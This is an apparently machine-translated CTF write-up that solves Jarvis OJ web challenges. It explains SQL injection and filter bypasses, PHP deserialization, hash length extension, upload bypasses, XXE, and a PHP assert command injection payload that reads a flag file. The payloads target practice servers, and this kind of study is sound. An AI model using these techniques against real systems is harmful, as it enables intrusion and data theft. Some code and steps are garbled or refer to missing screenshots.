0x00 Preface:
A good CTF platform I encountered recently, just for fun.
0x01 RE? :
This question is somewhat esoteric, first download the attachment, named udf.so. (a lot of characters).
Udf is an extended interface of mysql, which is通俗来讲 is a user-defined function. And when the suffix is .so, it can be known that the environment of the website built is a Linux environment. Udf files can be used with this statement.
CREATE FUNCTION [Custom Function Name] RETURNS [Return Type]{STRING|INTEGER|REAL} SONAME ["Filename"];
Firstly, we need to find a folder called plugin under the mysql of the local Linux machine.
(Remote connection to Linux mysql in windows environment)
You can see the absolute path of the directory, and the next step will be to put the downloaded file in this directory.
According to the hints of the question (help_me), execute the SQL statement to query the value of this function.
Use the getflag method to obtain the flag,
PS: I already have this method here, not a statement problem
0x02 PORT51:
Question link:http://web.jarvisoj.com:32770/
Enter the question, requiring access to the site using port 51. After obtaining the guidance, access it directly using the curl command.
This question is not very difficult, and the test point is also relatively single, just one command to solve it. But there may be errors, and I think it may be because the network at home is not allocated a public network address. If you access it with a server, there will be no such problem.
0x03 LOCALHOST:
Problem entry:http://web.jarvisoj.com:32774/
After opening the question, it tells us that we can only access the local host.
This question tests something called XFF (X-Forwarded-For), which is an HTTP extension header. In simple terms, XFF is used to identify the original IP address and request header fields of the client that connects to the web server through an HTTP proxy.
This question allows you to intercept and modify the HTTP request header, setting the XFF value to 127.0.0.1.
0x04 The Secret of the Shield Bureau:
Question gateway:web.jarvisoj.com:32768
Firstly, after opening the question, it is a habit to take a look at the source code.
Access showimg.php and pass the parameters given in the source code.
Decode the parameter values with base64, and the decoded parameter value is shieid.jpg. It is guessed that there is a file read vulnerability at this location. Encode showimg.php with base64 and pass it as a parameter.
Indeed, the source code of showimg.php was read, this file has done some filtering, and prohibited access to the upper directory. Let's read the code of index.php next.
Index.php imports shield.php, read directly.
This file tells us the location of the flag, and in showing.php, pctf is filtered, so we cannot access it directly through showimg.php. But there is a file_get_contents() function, which can be used in conjunction with unserialize() in index.php to obtain the flag.
Construct the serialized string.
Access index.php, pass the serialized string into the class, view the source code to get the flag.
没想到直接访问还会有个假的flag,草率了。
0x05 Login:
Problem entry:web.jarvisoj.com:32772
Enter the question and capture and analyze it.
The return header hints at a SQL statement, and there is no need to elaborate on SQL here. The controllable point in the statement is $pass wrapped in the md5 function. Here we need to understand the md5 function first. When the second parameter is true, it will return the original 16-character binary format. So can we use this problem to construct a universal key for login?
Here we can see that aaaa is turned into alphanumeric + a lot of garbage code. So here we need to understand a special string -ffifdyopThis string becomes 'or'6[Garbled code] after being converted by the md5 function. Let's test it locally and see the result.
Local testing is ok, the question is solved in one go.
0x06 IN A Mess:
Problem entry:http://web.jarvisoj.com:32780/
Capture the packet and access the question, and find that the comment hints at index.phps. We access it directly.
It can be seen that it needs three parameters a, b, and id.
First, here we can use php://input, and POST an 1112 is a nice lab!, or we can use data:,1112 is a nice lab! directly;
b only needs the number of characters to be greater than 5, and can bypass the eregi function with %00;
Id here is a very hasty weak comparison;
Finally, enter these three parameters for access.
He gave a rather confusing thing, at first thought it was a flag, but after half a day's submission, it turned out to be a directory, continue to visit.
A simple test was done and it was found that spaces and /**/ are filtered. We use /*[any character]*/ to bypass, test the number of fields, and the number of fields is 3 and displayed normally. When the number of fields is 4, it is displayed abnormally.
After confirming the number of fields, start to leak the database name. Many wp on the Internet use double writing to bypass it, but it can also be bypassed by using other filtered characters.
It can be seen that from here, the restriction is bypassed by using from, and the echo is at position 3, querying the database name.
Query the table name, because the quotes are filtered, use the database function to get the table name first.
Query the column name, and use hex encoding to bypass quotes to execute statements here.
Got the table and column names, and started to query the flag value.
0x07 flag is in the administrator's hand:
Question link:http://web.jarvisoj.com:32778/
After entering the question, collect information, and find two set cookies in the corresponding header. From this, we can know that this question should be related to these two pieces of information, and then we will try to find the source code. Common ways to find source code include, and there are no hints in the source code, we can directly access robots.txt to try.
It is obviously not there, let's try the usual套路 that the question setter likes, visit index.php~download the source code. The file can be opened directly to see that the order of the source code is reversed, or the file can be restored using the linux vim-r command. Before restoring the file, you need to change the suffix to .swp. For convenience of viewing, let's use Kali to restore the file.
A simple analysis of the source code shows that the role parameter needs to pass a serialized admin here, while hsh needs to concatenate the md5 value of the reversed role with the $salt. This is a point of attack for hash length extension, simply put, we know the value given by the server in the cookie, called hash1, and it contains salt. We can do a hash1 and admin MD5 operation to get hash2, and then assign hash2 to hsh, which meets the requirements of the code.
Calculation can be done by writing a python script to run, or by using the hashpump tool.
Get the final flag.
0x08 Chopper:
This question may have some problems, and the wp found on the Internet cannot be reproduced either. There will be no further elaboration here.
0x09 Easy Gallery:
Problem entry:http://web.jarvisoj.com:32785/
Enter the question, and an upload point is found in index.php?page=submit.
Packet capture changes the filename for testing, first upload an empty file to try.
The encoding format causes some minor ugliness, but overall, the problem is not big. Here, it is determined that it is the file header that is being checked.
We added a GIF89a and successfully bypassed the filter. The next step is to directly upload PHP code in it.
The uploaded PHP code is fine, and we can get the file path through the ID in the view. The file path is uploads/1646740311.jpg, and now we can use the page parameter in the URL to pass the path of the uploaded file.
The code appends a .php suffix after the filename, so we use %00 to bypass it, but we still didn't get the flag.
We can see that it still reports an error that there is no file. The initial guess is that the code filters characters like <?php, so we use another method to upload the file.
Access this file to get the flag.
PS: We were originally afraid that eval would be filtered, so we tested with phpinfo, and unexpectedly got the flag directly.
0x10 Simple Injection:
Problem entry:http://web.jarvisoj.com:32787/
According to the hints in the question, it is a simple injection. Enter the account and password to capture packets for access.
Here, when the username is admin, it will prompt password error. When assigned to other values, it will report username error, so this question should be about boolean blind injection. Let's test whether this injection point is in the username position.
Successfully found the injection point, the code filters spaces, and this is the old style of the setter. The next step can be to carry out brute force attacks, and write a python script for injection.
MD5 decryption.
Normal login to get the flag.
0x11 API call:
Problem entry:http://web.jarvisoj.com:9882/
Enter the question to view the source code, and we see XMLHttpRequest in the code, indicating that it should be related to XML. Click go to capture packets, and we can see the data sent in JSON format.
Here, we change the content-Type to application/xml, and change the sent JSON data to our XML format data information. Read the information of /home/ctf/flag.txt indicated in the question.
0x12 PHPINFO:
Problem entry:http://web.jarvisoj.com:32784/
Opening the file, at first glance there seems to be no problem, and the data passed in is also uncontrollable. However, in the second line, the statement ini_set('session.serialize_handler', 'php'); appears, and we immediately consider whether it is related to session deserialization in PHP. We pass in a parameter to check the settings in his phpinfo.
We directly jump to the settings about session.
PHP has built-in processors for serialization and deserialization of $_SESSION data. Among them, the commonly used ones are three, among which the default before php 5.5.4 is php, and after 5.5.4 is php_serialize. If the session serialization selector is different from the default, it may cause vulnerabilities. Additionally, session.upload_progress.enabled is set to On, and this configuration item is enabled. When posting a variable with the same name as session.upload_progress.name,
PHP stores the filename in $_SESSION. The conditions for session deserialization are already in place. Now we just need to construct a form that starts with both upload and post and submit it.
Here we upload a random file for packet capture, pre-construct the serialization string. There is a problem that double quotes will be escaped, we need to add \ in front of it, and also add | at the beginning.
Here we change the filename to the deserialization string we have constructed. We can see that we have successfully obtained the location of the flag file. Here we need to go back and check the path stored in the session file.
Get this path, construct the next deserialization string. Here we use the file_get_contents() function to write the file into a string and finally echo it out.
0x13 admin:
Problem entry:http://web.jarvisoj.com:32792/
Enter the question environment. There are no hints in the source code. Consider the issue of information leakage and access robots.txt.
Directly access to see.
Here is a fake flag. Combine the question and check the cookie.
Directly change it to 1 to get the flag.
0x14 WEB?:
Problem entry:http://web.jarvisoj.com:9891/
After obtaining the question, check the source code. It is found that the password here is verified by JavaScript, and a file called app.js is introduced, which can be followed up.
First, online format it, since it's a password, let's search for 'password'.
Follow up checkpass.
Follow up __checkpass__REACT_HOT_LOADER__
Matrix?? Write a script to solve the flag.
0x15 inject:
Problem entry:http://web.jarvisoj.com:32794/
According to the hints in the problem, find the source code first. The robots.txt file does not exist. The setter uses the old套路 to access index.php~
Audit the code, where the role of ` ` is to prevent the error when the field is a keyword. Adding backticks to the statement will not cause the statement to fail. Here, just construct the desc `test` ` [union union injection statement] to perform SQL injection. But only the first result is displayed, so limit is used to make the data visible.
We have obtained the database, and we start to query the tables. The problem filters single quotes, so we don't use single quotes for injection. We query the data one by one.
It is obvious that the first table among so many tables is the table where the flag is stored. Next, start querying the column names in the same way.
The table and column names are all there, so we can directly query the data.
0x16 babyphp:
Problem entry:http://web.jarvisoj.com:32798/
Enter the problem, and in the about interface, I found three similar hints, among which git is considered due to the possibility of git leakage, and the git directory is accessed.
There is no 404 error reported, indicating the existence of a git directory. Try to get the php source code using git scanning tools. View the key part.
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
}
$page = "home";
}
$file = "templates/" . $page . ".php";
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
assert("file_exists('$file')") or die("That file doesn't exist!");
?>There is a dangerous function assert. Assert($assertion, [$description])——It checks the specified assertion and takes appropriate action if the result is false (if it is not false, this statement will be executed), after understanding this function, we can directly construct the payload?page='.system('cat templates/flag.php').' to view the source code and obtain the flag.
AI Large Model Security: Prompt Injection Attack (Prompt Injection Attack)
Eighth. Blind injection based on boolean header injection
DLL injection vs. Shellcode injection
0x02 Research on Simple Memory Horse Injection in Python Flask
Git leak && AWS AKSK && AWS Lambda cli && Function Information Leakage && JWT secret leak
I. The principle of SQL injection login
Combining ppid deception and far-thread injection to achieve DLL hollowing
评论已关闭